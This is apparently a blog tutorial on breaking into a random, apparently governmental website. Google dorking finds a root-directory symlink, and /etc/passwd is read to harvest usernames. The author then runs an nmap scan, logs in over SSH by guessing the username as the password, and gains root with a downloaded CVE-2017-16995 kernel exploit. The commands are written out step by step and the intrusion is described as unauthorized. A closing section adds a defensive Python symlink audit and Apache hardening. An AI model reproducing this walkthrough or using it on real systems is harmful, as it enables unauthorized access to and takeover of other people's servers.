Obtaining superuser privileges on a random website.
For an ordinary user, Google is just a search engine used for searching text, images, videos, and news. However, the capabilities of this search engine are huge, more than it may seem, including searching for vulnerable websites.
Google Dork, also known as Google Dorking or Google Hacking, is a valuable resource for security researchers. It has its own built-in language of queries, called "Google Dork Operators".

The "inurl:" operator is used to retrieve results whose URL contains only a single keyword, for example, inurl: admin.

Using Google Dork and the inurl: /proc/self/cwd operator, this site was discovered, which contained a link leading directly to the server's root directory. This vulnerability lies in the fact that the site directory contains a symbolic link (symlink) that leads to the root directory (/).

Getting Information about Linux Users
So, once we have entered the server's root directory, we need to find out information about the users that exist on the system. They are contained in /etc/passwd and /etc/shadow. We need the passwd file, as the shadow file is simply not accessible to a regular user.

The names of regular users may begin with the ID 1000. The user kajari is the one we need.

Checking for OpenSSH Service on an Open Port
Using the Nmap tool, we will scan the server for open ports.

Open any terminal (even Termux) and type the following command:
$ nmap site.go.id
We get the output:

As we can see, port 22 is open and the OpenSSH service is running.

SSH Login
Connect to the server via SSH as kajari:

$ ssh site.go.id
Without further ado, let's try to enter a banal password, namely the username itself (kajari) and-...

Voila! We're in! Of course, this is far from the final. We still need to get root access.

Since the version of Ubuntu and the Linux kernel is old, we will use the "Linux Exploit Suggester" script from the GitHub repository. It detects security issues with Linux kernel machines and provides links to exploits for these vulnerabilities.

Downloading the Script and Searching for Vulnerabilities
We download and run the script with the following commands:

$ wget -O search.sh ...
$ chmod +x search.sh
$ ./search.sh

The script output a list of 4 vulnerabilities. The most likely vulnerability is CVE-2017-16995, which is the one we will use.

Downloading, Compiling, and Running the Exploit
From the vulnerability information, we download the exploit via the link provided in "Download URL":

$ wget -O exploit_code.c ...
Using the GCC compiler, we compile the exploit into an executable file:

$ gcc -o exploit exploit_code.c
And we run it:

$ chmod +x exploit
$ ./exploit

Congratulations! We have gained root access! This is evidenced by the output of the whoami command and the prompt (#).
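As an added check from the defender's side (example code, not part of the post above): a Python audit that walks a web document root and reports every symlink whose resolved target lies outside that root, which is the condition that exposed the whole filesystem in the post. The document root and the sample links are constructed in a temporary directory; no real site is touched.

```python
import os
import tempfile
from pathlib import Path


def escaping_symlinks(docroot):
    """Return sorted (link, target) pairs for symlinks under docroot whose
    resolved target is not inside docroot. Links are not followed while
    walking, so a link to '/' is reported once rather than recursed into."""
    root = Path(docroot).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            target = link.resolve()  # follows the whole link chain
            try:
                target.relative_to(root)  # raises if target escapes root
            except ValueError:
                findings.append((str(link.relative_to(root)), str(target)))
    return sorted(findings)


def build_demo_docroot():
    """Construct a throwaway document root: one harmless in-tree link,
    one link straight to '/' (the pattern from the post) and one relative
    link that climbs out of the tree."""
    base = Path(tempfile.mkdtemp(prefix="docroot-"))
    (base / "css").mkdir()
    (base / "index.html").write_text("<html></html>\n")
    os.symlink("index.html", base / "home.html")            # stays inside
    os.symlink("/", base / "cwd")                           # exposes everything
    os.symlink("../../../etc/passwd", base / "css" / "p")   # relative escape
    return base


if __name__ == "__main__":
    demo = build_demo_docroot()
    for link, target in escaping_symlinks(demo):
        print(f"ESCAPING: {link} -> {target}")
```

On Apache, the same exposure is closed at the server level with `Options -FollowSymLinks` (or `SymLinksIfOwnerMatch`) for the document root, so a stray link cannot be served even if the audit misses it.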